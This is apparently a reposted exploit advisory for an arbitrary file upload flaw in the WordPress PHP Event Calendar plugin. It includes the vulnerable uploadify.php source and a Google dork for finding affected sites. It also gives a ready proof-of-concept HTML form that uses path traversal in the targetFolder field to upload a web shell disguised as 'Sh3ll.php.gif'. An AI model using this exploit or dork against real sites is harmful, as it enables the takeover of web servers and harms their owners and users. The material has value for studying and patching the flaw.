#- Title: WordPress PHP Event Calendar Arbitrary File Upload
#- Author: CrashBandicot
#- Date: 04/02/2015
#- Vendor : phpeventcalendar. com
#- Developer : -
#- Link Download : Wordpress. org/plugins/php-event-calendar/
#- Google Dork: inurl:wp-content/plugins/php-event-calendar/
#- Tested on : MSwin
#- Fixed in Version : > 1.5
=======================================================================
&- Vulnerability : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php ( "Uploadify.php" )
Bug Code :
<?php
/*
Uploadify
Copyright (c) 2012 Reactive Apps, Ronnie Garcia
Released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
// Define a destination
//$targetFolder = '/uploads'; // Relative to the root
$targetFolder = $_POST['targetFolder']; // wp upload directory
$dir = str_replace('\\','/',dirname(__FILE__));
//$verifyToken = md5('unique_salt' . $_POST['timestamp']);
if (!empty($_FILES)) {
$tempFile = $_FILES['Filedata']['tmp_name'];
//$targetPath = $dir.$targetFolder;
$targetPath = $targetFolder;
$fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];
$targetFile = rtrim($targetPath,'/') . '/' . $fileName;
// Validate the file type
$fileTypes = array('jpg','jpeg','gif','png'); // File extensions
$fileParts = pathinfo($_FILES['Filedata']['name']);
if (in_array($fileParts['extension'],$fileTypes)) {
move_uploaded_file($tempFile,$targetFile);
echo '1';
} else {
echo 'Invalid file type.';
}
&- When Vulnerable : *Blank*
Proof Of Concept :
Material : Sh3ll.php.gif (if support) / Upload image.gif
HTML Code :
<div><form action="http://3xploi7.com/wp-content/plugins/php-event-calendar/server/classes/uploadify.php" method="post" enctype="multipart/form-data">
<input type="file" name="Filedata" id="file" ><br>
<input type="text" name="targetFolder" value="../../../../../" id="file" ><br>
<input type="text" name="user_id" value="3xploi7" id="file" ><br>
<input type="submit" name="submit" value="3xploi7ed !" >
</form></div>
Shell Acces ? Here
Tidak ada komentar:
Posting Komentar